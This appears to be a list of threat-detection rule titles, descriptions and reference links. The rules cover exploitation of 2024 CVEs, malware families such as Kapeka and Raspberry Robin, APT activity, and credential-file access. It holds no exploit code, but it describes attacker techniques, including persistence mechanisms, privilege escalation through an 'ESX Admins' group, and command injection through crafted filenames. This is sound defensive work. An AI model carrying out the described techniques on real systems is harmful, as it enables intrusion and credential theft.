https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass, https://www.cve.org/CVERecord?id=CVE-2024-1709 |
ScreenConnect User Database Modification - Security |
This detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.
|
https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8, https://www.cve.org/CVERecord?id=CVE-2024-1709, https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass |
Potential Exploitation of CVE-2024-3094 - Suspicious SSH Child Process |
Detects potentially suspicious child process of SSH process (sshd) with a specific execution user. This could be a sign of potential exploitation of CVE-2024-3094.
|
https://github.com/amlweems/xzbot?tab=readme-ov-file#backdoor-demo |
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation |
Detects suspicious file creations in the Palo Alto Networks PAN-OS' parent telemetry folder, which are processed by the vulnerable 'dt_curl' script if device telemetry is enabled.
As said script overrides the shell-subprocess restriction, arbitrary command execution may occur by carefully crafting filenames that are escaped through this function.
|
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/, https://nvd.nist.gov/vuln/detail/CVE-2024-3400 |
Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection |
Detects potential exploitation attempts of CVE-2024-3400 - an OS command injection in Palo Alto GlobalProtect.
This detection looks for suspicious strings that indicate a potential directory traversal attempt or command injection.
|
https://security.paloaltonetworks.com/CVE-2024-3400, https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/, https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis |
Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group |
Detects execution of the "net.exe" command in order to add a group named "ESX Admins".
This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor.
VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
|
https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/ |
Potential Exploitation of CVE-2024-37085 - Suspicious ESX Admins Group Activity |
Detects any creation or modification to a windows domain group with the name "ESX Admins".
This could indicates a potential exploitation attempt of CVE-2024-37085, which allows an attacker to elevate their privileges to full administrative access on an domain-joined ESXi hypervisor.
VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named "ESX Admins" to have full administrative access by default.
|
https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/ |
CVE-2024-49113 Exploitation Attempt - LDAP Nightmare |
Detects exploitation attempt of CVE-2024-49113 known as LDAP Nightmare, based on "Application Error" log where the faulting application is "lsass.exe" and the faulting module is "WLDAP32.dll".
|
https://gist.github.com/travisbgreen/82b68bac499edbe0b17dcbfa0c5c71b7, https://www.linkedin.com/feed/update/urn:li:activity:7282295814792605698/ |
CVE-2024-50623 Exploitation Attempt - Cleo |
Detects exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawning from the Celo software suite with suspicious Powershell commandline.
|
https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild |
Potential CSharp Streamer RAT Loading .NET Executable Image |
Detects potential CSharp Streamer RAT loading .NET executable image by using the default file name and path associated with the tool.
|
https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/#detections, https://cyber.wtf/2023/12/06/the-csharp-streamer-rat/ |
DarkGate - Drop DarkGate Loader In C:\Temp Directory |
Detects attackers attempting to save, decrypt and execute the DarkGate Loader in C:\temp folder. |
https://www.bleepingcomputer.com/news/security/hackers-exploit-windows-smartscreen-flaw-to-drop-darkgate-malware/, https://www.trendmicro.com/en_us/research/24/c/cve-2024-21412--darkgate-operators-exploit-microsoft-windows-sma.html |
File Creation Related To RAT Clients |
File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
|
https://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761, https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675 |
Potential KamiKakaBot Activity - Lure Document Execution |
Detects the execution of a Word document via the WinWord Start Menu shortcut.
This behavior was observed being used by KamiKakaBot samples in order to initiate the 2nd stage of the infection.
|
https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/ |
Potential KamiKakaBot Activity - Shutdown Schedule Task Creation |
Detects the creation of a schedule task that runs weekly and execute the "shutdown /l /f" command.
This behavior was observed being used by KamiKakaBot samples in order to achieve persistence on a system.
|
https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/, https://tria.ge/240123-rapteaahhr/behavioral1 |
Potential KamiKakaBot Activity - Winlogon Shell Persistence |
Detects changes to the "Winlogon" registry key where a process will set the value of the "Shell" to a value that was observed being used by KamiKakaBot samples in order to achieve persistence.
|
https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/ |
Potential Kapeka Decrypted Backdoor Indicator |
Detects the presence of a file that is decrypted backdoor binary dropped by the Kapeka Dropper, which disguises itself as a hidden file under a folder named "Microsoft" within "CSIDL_COMMON_APPDATA" or "CSIDL_LOCAL_APPDATA", depending on the process privileges.
The file, typically 5-6 characters long with a random combination of consonants and vowels followed by a ".wll" extension to pose as a legitimate file to evade detection.
|
https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/ |
Kapeka Backdoor Loaded Via Rundll32.EXE |
Detects the Kapeka Backdoor binary being loaded by rundll32.exe.
The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.
|
https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/ |
Kapeka Backdoor Persistence Activity |
Detects Kapeka backdoor persistence activity.
Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not).
For the scheduled task, it creates a scheduled task called "Sens Api" via schtasks command, which is set to run upon system startup as SYSTEM.
To establish persistence through the autorun utility, it adds an autorun entry called "Sens Api" under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run via the "reg add" command.
Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.
|
https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/, https://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior |
Kapeka Backdoor Execution Via RunDLL32.EXE |
Detects Kapeka backdoor process execution pattern, where the dropper launch the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a "-d" argument.
|
https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/ |
Kapeka Backdoor Autorun Persistence |
Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence. |
https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/ |
Kapeka Backdoor Configuration Persistence |
Detects registry set activity of a value called "Seed" stored in the "\Cryptography\Providers\" registry key.
The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.
|
https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/ |
Kapeka Backdoor Scheduled Task Creation |
Detects Kapeka backdoor scheduled task creation based on attributes such as paths, commands line flags, etc. |
https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698, https://labs.withsecure.com/publications/kapeka, https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/, https://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior |
Lummac Stealer Activity - Execution Of More.com And Vbc.exe |
Detects the execution of more.com and vbc.exe in the process tree.
This behavior was observed by a set of samples related to Lummac Stealer.
The Lummac payload is injected into the vbc.exe process.
|
https://www.virustotal.com/gui/search/behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CSysWOW64%255C%255Cmore.com%2522%2520behaviour_processes%253A%2522C%253A%255C%255CWindows%255C%255CMicrosoft.NET%255C%255CFramework%255C%255Cv4.0.30319%255C%255Cvbc.exe%2522/files, https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef, https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html, https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html |
Potential Raspberry Robin Aclui Dll SideLoading |
Detects potential sideloading of malicious "aclui.dll" by OleView.This behavior was observed in Raspberry-Robin variants reported by chekpoint research on Feburary 2024.
|
https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/, https://globetech.biz/index.php/2023/05/19/evading-edr-by-dll-sideloading-in-csharp/, https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/, https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/, https://strontic.github.io/xcyclopedia/library/aclui.dll-F883E9CA757B622B032FDCA5BF33D0DF.html |
Potential Raspberry Robin CPL Execution Activity |
Detects the execution of a ".CPL" file located in the user temp directory via the Shell32 DLL "Control_RunDLL" export function.
This behavior was observed in multiple Raspberry-Robin variants.
|
https://tria.ge/240226-fhbe7sdc39/behavioral1, https://bazaar.abuse.ch/browse/signature/RaspberryRobin/ |
Potential Raspberry Robin Registry Set Internet Settings ZoneMap |
Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024.
Raspberry Robin may alter proxy settings to circumvent security measures, ensuring unhindered connection with Command and Control servers for maintaining control over compromised systems if there are any proxy settings that are blocking connections.
|
https://tria.ge/240225-jlylpafb24/behavioral1/analog?main_event=Registry&op=SetValueKeyInt, https://tria.ge/240307-1hlldsfe7t/behavioral2/analog?main_event=Registry&op=SetValueKeyInt, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_ProxyByPass, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_UNCAsIntranet, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_IncludeUnspecifiedLocalSites, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::SecurityPage_AutoDetect, https://bazaar.abuse.ch/browse/signature/RaspberryRobin/ |
DPRK Threat Actor - C2 Communication DNS Indicators |
Detects DNS queries for C2 domains used by DPRK Threat actors. |
https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?__blob=publicationFile&v=2 |
Potential APT FIN7 Exploitation Activity |
Detects potential APT FIN7 exploitation activity as reported by Google.
In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to login to a target server and initiate specific Windows process chains.
|
https://cloud.google.com/blog/topics/threat-intelligence/evolution-of-fin7/ |
Forest Blizzard APT - File Creation Activity |
Detects the creation of specific files inside of ProgramData directory.
These files were seen being created by Forest Blizzard as described by MSFT.
|
https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ |
Forest Blizzard APT - JavaScript Constrained File Creation |
Detects the creation of JavaScript files inside of the DriverStore directory.
Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.
|
https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ |
Forest Blizzard APT - Process Creation Activity |
Detects the execution of specific processes and command line combination.
These were seen being created by Forest Blizzard as described by MSFT.
|
https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ |
Forest Blizzard APT - Custom Protocol Handler Creation |
Detects the setting of a custom protocol handler with the name "rogue".
Seen being created by Forest Blizzard APT as reported by MSFT.
|
https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ |
Forest Blizzard APT - Custom Protocol Handler DLL Registry Set |
Detects the setting of the DLL that handles the custom protocol handler.
Seen being created by Forest Blizzard APT as reported by MSFT.
|
https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/ |
ScreenConnect - SlashAndGrab Exploitation Indicators |
Detects indicators of exploitation by threat actors during exploitation of the "SlashAndGrab" vulnerability related to ScreenConnect as reported Team Huntress
|
https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
Account Created And Deleted By Non Approved Users |
Detects accounts that are created or deleted by non-approved users. |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts |
Authentication Occuring Outside Normal Business Hours |
Detects user signs ins outside of normal business hours. |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins |
Privilege Role Elevation Not Occuring on SAW or PAW |
Detects failed sign-in from a PAW or SAW device |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor |
Privilege Role Sign-In Outside Expected Controls |
Detects failed sign-in due to user not meeting expected controls for adminitrators |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor |
Privilege Role Sign-In Outside Of Normal Hours |
Detects account sign ins outside of normal hours or uncommon locations. Administrator accounts should be investigated |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor |
User with Privileges Logon |
Detects logon with "Special groups" and "Special Privileges" can be thought of as Administrator groups or privileges. |
https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md, https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4672, https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4964 |
Potential Zerologon (CVE-2020-1472) Exploitation |
Detects potential Netlogon Elevation of Privilege Vulnerability aka Zerologon (CVE-2020-1472) |
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472, https://www.logpoint.com/en/blog/detecting-zerologon-vulnerability-in-logpoint/ |
Potential Pass the Hash Activity |
Detects the attack technique pass the hash which is used to move laterally inside the network |
https://github.com/nsacyber/Event-Forwarding-Guidance/tree/6e92d622fa33da911f79e7633da4263d632f9624/Events |
Remote Registry Management Using Reg Utility |
Remote registry management using REG utility from non-admin workstation |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Interactive Logon to Server Systems |
Detects interactive console logons to Server Systems |
Internal Research |
DNS Request From Windows Script Host |
Detects unusual domain resolutions originating from CScript/WScript that can identify malicious javascript files executing in an environment, often as a result from a phishing or watering hole attack.
|
Internal Research |
New RDP Connection Initiated From Domain Controller |
Detects an RDP connection originating from a domain controller. |
Internal Research |
Userdomain Variable Enumeration |
Detects suspicious enumeration of the domain the user is associated with. |
https://www.arxiv-vanity.com/papers/2008.04676/, https://thedfirreport.com/2022/11/14/bumblebee-zeros-in-on-meterpreter/ |
Mail Forwarding/Redirecting Activity In O365 |
Detects email forwarding or redirecting acitivty in O365 Audit logs. |
https://redcanary.com/blog/email-forwarding-rules/, https://github.com/PwC-IR/Business-Email-Compromise-Guide/blob/fe29ce06aef842efe4eb448c26bbe822bf5b895d/PwC-Business_Email_Compromise-Guide.pdf |
Python Path Configuration File Creation - Linux |
Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
|
https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/, https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, https://docs.python.org/3/library/site.html |
Okta Password Health Report Query |
Detects all activities against the endpoint "/reports/password-health/*" which should only be accessed via OKTA Admin Console UI.
Use this rule to hunt for potential suspicious requests. Correlate this event with "admin console" login and alert on requests without any corresponding admin console login
|
https://www.beyondtrust.com/blog/entry/okta-support-unit-breach |
Terminate Linux Process Via Kill |
Detects usage of command line tools such as "kill", "pkill" or "killall" to terminate or signal a running process. |
https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html, https://www.cyberciti.biz/faq/how-force-kill-process-linux/, https://www.geeksforgeeks.org/how-to-kill-processes-on-the-linux-desktop-with-xkill/ |
Process Discovery |
Detects process discovery commands. Adversaries may attempt to get information about running processes on a system.
Information obtained could be used to gain an understanding of common software/applications running on systems within the network
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md, https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/ |
Python Path Configuration File Creation - MacOS |
Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
|
https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/, https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, https://docs.python.org/3/library/site.html |
Clipboard Data Collection Via Pbpaste |
Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout).
The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands.
It can also be used in shell scripts that may require clipboard content as input.
Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information.
Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
|
https://www.loobins.io/binaries/pbpaste/, https://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b, https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF |
.Class Extension URI Ending Request |
Detects requests to URI ending with the ".class" extension in proxy logs.
This could rules can be used to hunt for potential downloads of Java classes as seen for example in Log4shell exploitation attacks against Log4j.
|
https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/ |
Firewall Rule Modified In The Windows Firewall Exception List |
Detects when a rule has been modified in the Windows firewall exception list |
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd364427(v=ws.10) |
Access To Browser Credential Files By Uncommon Applications - Security |
Detects file access requests to browser credential stores by uncommon processes. Could indicate potential attempt of credential stealing This rule requires heavy baselining before usage.
|
https://ipurple.team/2024/09/10/browser-stored-credentials/ |
Scheduled Task Deletion |
Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \TASKNAME |
https://twitter.com/matthewdunwoody/status/1352356685982146562, https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699 |
Potential Remote WMI ActiveScriptEventConsumers Activity |
Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network.
This event is best correlated and used as an enrichment to determine the potential lateral movement activity.
|
https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html |
CreateRemoteThread API and LoadLibrary |
Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process |
https://threathunterplaybook.com/hunts/windows/180719-DLLProcessInjectionCreateRemoteThread/notebook.html |
Remote Thread Creation Via PowerShell |
Detects the creation of a remote thread from a Powershell process to another process |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Access To Browser Credential Files By Uncommon Applications |
Detects file access requests to browser credential stores by uncommon processes.
Could indicate potential attempt of credential stealing.
Requires heavy baselining before usage
|
https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users, https://github.com/lclevy/firepwd |
Access To Chromium Browsers Sensitive Files By Uncommon Applications |
Detects file access requests to chromium based browser sensitive files by uncommon processes.
Could indicate potential attempt of stealing sensitive information.
|
Internal Research |
Access To Windows Outlook Mail Files By Uncommon Applications |
Detects file access requests to Windows Outlook Mail by uncommon processes.
Could indicate potential attempt of credential stealing.
Requires heavy baselining before usage
|
https://darkdefender.medium.com/windows-10-mail-app-forensics-39025f5418d2, https://github.com/redcanaryco/atomic-red-team/blob/58496ee3306e6e42a7054d36a94e6eb561ee3081/atomics/T1070.008/T1070.008.md#atomic-test-4---copy-and-modify-mailbox-data-on-windows |
Access To Sysvol Policies Share By Uncommon Process |
Detects file access requests to the Windows Sysvol Policies Share by uncommon processes |
https://github.com/vletoux/pingcastle |
Access To .Reg/.Hive Files By Uncommon Applications |
Detects file access requests to files ending with either the ".hive"/".reg" extension, usually associated with Windows Registry backups. |
https://github.com/tccontre/Reg-Restore-Persistence-Mole |
Unattend.XML File Access Attempt |
Detects attempts to access the "unattend.xml" file, where credentials might be stored.
This file is used during the unattended windows install process.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md |
ADS Zone.Identifier Deleted |
Detects the deletion of the "Zone.Identifier" ADS. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. |
https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/ |
DMP/HDMP File Creation |
Detects the creation of a file with the ".dmp"/".hdmp" extension. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. |
https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps |
Python Path Configuration File Creation - Windows |
Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence.
Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script.
Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS).
|
https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/, https://www.virustotal.com/gui/file/3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac, https://docs.python.org/3/library/site.html |
Scheduled Task Created - FileCreation |
Detects the creation of a scheduled task via file creation. |
https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/task_scheduling/, https://posts.specterops.io/abstracting-scheduled-tasks-3b6451f6a1c5 |
Creation of an Executable by an Executable |
Detects the creation of an executable by another executable. |
Internal Research |
VsCode Code Tunnel Execution File Indicator |
Detects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility. Attackers can abuse this functionality to establish a C2 channel
|
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html |
WebDAV Temporary Local File Creation |
Detects the creation of WebDAV temporary files with potentially suspicious extensions |
https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462, https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4 |
Non-DLL Extension File Renamed With DLL Extension |
Detects rename operations of files with non-DLL extensions to files with a DLL extension. This is often performed by malware in order to avoid initial detections based on extensions.
|
https://twitter.com/ffforward/status/1481672378639912960, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036/T1036.md#atomic-test-1---system-file-copied-to-unusual-location |
Amsi.DLL Load By Uncommon Process |
Detects loading of Amsi.dll by uncommon processes |
https://infosecwriteups.com/amsi-bypass-new-way-2023-d506345944e9, https://github.com/TheD1rkMtr/AMSI_patch, https://github.com/surya-dev-singh/AmsiBypass-OpenSession |
Dbghelp/Dbgcore DLL Loaded By Uncommon/Suspicious Process |
Detects the load of dbghelp/dbgcore DLL by a potentially uncommon or potentially suspicious process.
The Dbghelp and Dbgcore DLLs export functions that allow for the dump of process memory. Tools like ProcessHacker, Task Manager and some attacker tradecraft use the MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.
As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.
Keep in mind that many legitimate Windows processes and services might load the aforementioned DLLs for debugging or other related purposes. Investigate the CommandLine and the Image location of the process loading the DLL.
|
https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump, https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html, https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6 |
System Drawing DLL Load |
Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture. |
https://github.com/OTRF/detection-hackathon-apt29/issues/16, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.md |
Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location |
Detects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory.
The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object.
Investigation of the loading application and its behavior is required to determining if its malicious.
|
https://www.logpoint.com/en/blog/shenanigans-of-scheduled-tasks/, https://x.com/Max_Mal_/status/1826179497084739829 |
Microsoft Excel Add-In Loaded |
Detects Microsoft Excel loading an Add-In (.xll) file |
https://www.mandiant.com/resources/blog/lnk-between-browsers |
Microsoft Word Add-In Loaded |
Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence.
|
https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence, https://nored0x.github.io/red-teaming/office-persistence/#what-is-a-wll-file |
WMI Module Loaded By Uncommon Process |
Detects WMI modules being loaded by an uncommon process |
https://threathunterplaybook.com/hunts/windows/190811-WMIModuleLoad/notebook.html |
Dfsvc.EXE Network Connection To Non-Local IPs |
Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs |
https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 |
Dfsvc.EXE Initiated Network Connection Over Uncommon Port |
Detects an initiated network connection over uncommon ports from "dfsvc.exe". A utility used to handled ClickOnce applications. |
https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5 |
Dllhost.EXE Initiated Network Connection To Non-Local IP Address |
Detects Dllhost.EXE initiating a network connection to a non-local IP address.
Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL.
An initial baseline is recommended before deployment.
|
https://redcanary.com/blog/child-processes/, https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08 |
HH.EXE Initiated HTTP Network Connection |
Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
|
https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html, https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md |
Msiexec.EXE Initiated Network Connection Over HTTP |
Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443.
Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages.
Use this rule to hunt for potentially anomalous or suspicious communications.
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md |
Network Connection Initiated By PowerShell Process |
Detects a network connection that was initiated from a PowerShell process.
Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs.
Use this rule as a basis for hunting for anomalies.
|
https://www.youtube.com/watch?v=DLtJTxMWZ2o |
